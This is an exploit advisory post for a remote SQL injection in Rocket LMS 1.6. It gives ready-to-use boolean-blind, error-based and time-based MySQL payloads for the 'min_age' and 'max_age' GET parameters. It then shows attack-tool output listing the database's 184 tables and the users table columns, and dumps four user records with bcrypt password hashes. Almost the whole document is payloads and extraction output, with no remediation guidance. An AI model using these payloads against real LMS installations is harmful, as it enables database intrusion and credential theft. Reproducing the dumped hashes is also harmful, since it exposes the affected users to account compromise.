Headline
Rocket LMS 1.6 SQL Injection
Rocket LMS version 1.6 suffers from a remote SQL injection vulnerability.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack… ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr │ │ :
│ Website : rocket-soft.org │ │ Rocket LMS - Learning Management System │
│ Vendor : RocketSoft │ │ │
│ Software : Rocket LMS v 1.6 │ │ is an online course marketplace with a │
│ Vuln Type: Remote SQL Injection │ │ pile of features that helps you to run │
│ Method : GET │ │ your online education business easily │
│ Impact : Database Access │ │ │
│ │ │ │
│────────────────────────────────────────────┘ └─────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL
Ivo @palaziv
CryptoJob (Twitter) twitter.com/CryptozJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
GET parameter ‘min_age’ is vulnerable
Parameter: min_age (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=(SELECT (CASE WHEN (8536=8536) THEN 18 ELSE (SELECT 7625 UNION SELECT 1202) END))&max_age=99&day[]=saturday&min_time=&max_time=&country_id=
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(1687=1687,1))),0x71786a6a71),1687)&max_age=99&day[]=saturday&min_time=&max_time=&country_id=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND (SELECT 2819 FROM (SELECT(SLEEP(5)))SBYp)&max_age=99&day[]=saturday&min_time=&max_time=&country_id=
GET parameter ‘max_age’ is vulnerable
Parameter: max_age (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=(SELECT (CASE WHEN (2763=2763) THEN 99 ELSE (SELECT 3665 UNION SELECT 7462) END))&day[]=saturday&min_time=&max_time=&country_id=
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(5555=5555,1))),0x71786a6a71),5555)&day[]=saturday&min_time=&max_time=&country_id=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND (SELECT 2169 FROM (SELECT(SLEEP(5)))mngI)&day[]=saturday&min_time=&max_time=&country_id=
[+] Starting the Attack
[INFO] fetching current database
[INFO] the back-end DBMS is MySQL
web application technology: Apache 2, PHP 7.4.30
back-end DBMS: MySQL >= 5.6
current database: ‘admin_learn’
[INFO] fetching tables for database: ‘admin_learn’
Database: admin_learn
[184 tables]
±-----------------------------------------------+
| groups |
| accounting |
| advertising_banners |
| advertising_banners_translations |
| affiliates |
| affiliates_codes |
| agora_history |
| badge_translations |
| badges |
| become_instructors |
| blog |
| blog_categories |
| blog_translations |
| bundle_filter_option |
| bundle_translations |
| bundle_webinars |
| bundles |
| cart |
| categories |
| category_translations |
| certificate_template_translations |
| certificates |
| certificates_templates |
| comments |
| comments_reports |
| contacts |
| course_forum_answers |
| course_forums |
| course_learning |
| course_noticeboard_status |
| course_noticeboards |
| delete_account_requests |
| discount_categories |
| discount_courses |
| discount_groups |
| discount_users |
| discounts |
| faq_translations |
| faqs |
| favorites |
| feature_webinar_translations |
| feature_webinars |
| file_translations |
| files |
| filter_option_translations |
| filter_options |
| filter_translations |
| filters |
| follows |
| forum_featured_topics |
| forum_recommended_topic_items |
| forum_recommended_topics |
| forum_topic_attachments |
| forum_topic_bookmarks |
| forum_topic_likes |
| forum_topic_posts |
| forum_topic_reports |
| forum_topics |
| forum_translations |
| forums |
| group_users |
| groups_registration_packages |
| home_sections |
| jazzcash_transactions |
| meeting_times |
| meetings |
| migrations |
| navbar_button_translations |
| navbar_buttons |
| newsletters |
| newsletters_history |
| noticeboards |
| noticeboards_status |
| notification_templates |
| notifications |
| notifications_status |
| offline_payments |
| order_items |
| orders |
| page_translations |
| pages |
| password_resets |
| payku_payments |
| payku_transactions |
| payment_channels |
| payouts |
| payu_transactions |
| permissions |
| prerequisites |
| product_categories |
| product_category_translations |
| product_discounts |
| product_faq_translations |
| product_faqs |
| product_file_translations |
| product_files |
| product_filter_option_translations |
| product_filter_options |
| product_filter_translations |
| product_filters |
| product_media |
| product_orders |
| product_reviews |
| product_selected_filter_options |
| product_selected_specification_multi_values |
| product_selected_specification_translations |
| product_selected_specifications |
| product_specification_categories |
| product_specification_multi_value_translations |
| product_specification_multi_values |
| product_specification_translations |
| product_specifications |
| product_translations |
| products |
| promotion_translations |
| promotions |
| purchases |
| quiz_question_translations |
| quiz_translations |
| quizzes |
| quizzes_questions |
| quizzes_questions_answer_translations |
| quizzes_questions_answers |
| quizzes_results |
| rating |
| regions |
| registration_packages |
| registration_packages_translations |
| reserve_meetings |
| rewards |
| rewards_accounting |
| roles |
| sales |
| sales_log |
| sections |
| session_reminds |
| session_translations |
| sessions |
| setting_translations |
| settings |
| special_offers |
| subscribe_reminds |
| subscribe_translations |
| subscribe_uses |
| subscribes |
| support_conversations |
| support_department_translations |
| support_departments |
| supports |
| tags |
| testimonial_translations |
| testimonials |
| text_lesson_translations |
| text_lessons |
| text_lessons_attachments |
| ticket_translations |
| ticket_users |
| tickets |
| trend_categories |
| users |
| users_badges |
| users_cookie_security |
| users_manual_purchase |
| users_metas |
| users_occupations |
| users_registration_packages |
| users_zoom_api |
| verifications |
| webinar_assignment_attachments |
| webinar_assignment_history |
| webinar_assignment_history_messages |
| webinar_assignment_translations |
| webinar_assignments |
| webinar_chapter_items |
| webinar_chapter_translations |
| webinar_chapters |
| webinar_extra_description_translations |
| webinar_extra_descriptions |
| webinar_filter_option |
| webinar_partner_teacher |
| webinar_reports |
| webinar_reviews |
| webinar_translations |
| webinars |
±-----------------------------------------------+
[INFO] fetching columns for table ‘users’ in database ‘admin_learn’
Database: admin_learn
Table: users
[49 columns]
±-------------------±------------------------------------+
| Column | Type |
±-------------------±------------------------------------+
| language | varchar(255) |
| about | text |
| access_content | tinyint(1) |
| account_id | varchar(128) |
| account_type | varchar(128) |
| address | varchar(255) |
| affiliate | tinyint(1) |
| avatar | varchar(255) |
| avatar_settings | varchar(255) |
| ban | tinyint(1) |
| ban_end_at | int(10) unsigned |
| ban_start_at | int(10) unsigned |
| bio | varchar(128) |
| can_create_store | tinyint(1) |
| certificate | varchar(128) |
| city_id | int(10) unsigned |
| commission | int(10) unsigned |
| country_id | int(10) unsigned |
| cover_img | varchar(255) |
| created_at | int(11) |
| deleted_at | int(11) |
| district_id | int(10) unsigned |
| email | varchar(255) |
| facebook_id | varchar(255) |
| financial_approval | tinyint(1) |
| full_name | varchar(128) |
| google_id | varchar(255) |
| headline | varchar(255) |
| iban | varchar(128) |
| id | int(10) unsigned |
| identity_scan | varchar(128) |
| level_of_training | bit(3) |
| location | point |
| meeting_type | enum(‘all’,’in_person’,’online’) |
| mobile | varchar(32) |
| newsletter | tinyint(1) |
| offline | tinyint(1) |
| offline_message | text |
| organ_id | int(11) |
| password | varchar(255) |
| province_id | int(10) unsigned |
| public_message | tinyint(1) |
| remember_token | varchar(255) |
| role_id | int(10) unsigned |
| role_name | varchar(64) |
| status | enum(‘active’,’pending’,’inactive’) |
| timezone | varchar(255) |
| updated_at | int(11) |
| verified | tinyint(1) |
±-------------------±------------------------------------+
[INFO] fetching entries of column(s) ‘account_id,account_type,email,id,password’ for table ‘users’ in database ‘admin_learn’
Database: admin_learn
Table: users
[4 entries]
±-----±--------------±--------------------±----------------------------±-------------------------------------------------------------+
| id | account_id | account_type | email | password |
±-----±--------------±--------------------±----------------------------±-------------------------------------------------------------+
| 1 | NULL | NULL | [email protected] | $2y$10$nSUg1Z2rltHGecudC6dEEeRoqfIhlHi8WaAFFQs57oyFtpkvvQufW |
| 867 | NULL | NULL | [email protected] | $2y$10$W0.rfZgYCWGr/rOSrGrGg.Nnm6xBVdR3FYjJiXqiq6LZdx2Ds.aXq |
| 995 | NULL | NULL | [email protected] | $2y$10$Hc4OzTkL3i5vmHXXvZvSfOsZDMD/XYwO4yS8UOtUIAFQcXYhIIJsa |
| 1015 | NULL | NULL | [email protected] | $2y$10$8.jgtS/cg8L6HfuuBgWnkeg49r0LiY7kofR6eiY9b.mx747i82n.u |
±-----±--------------±--------------------±----------------------------±-------------------------------------------------------------+
[-] Done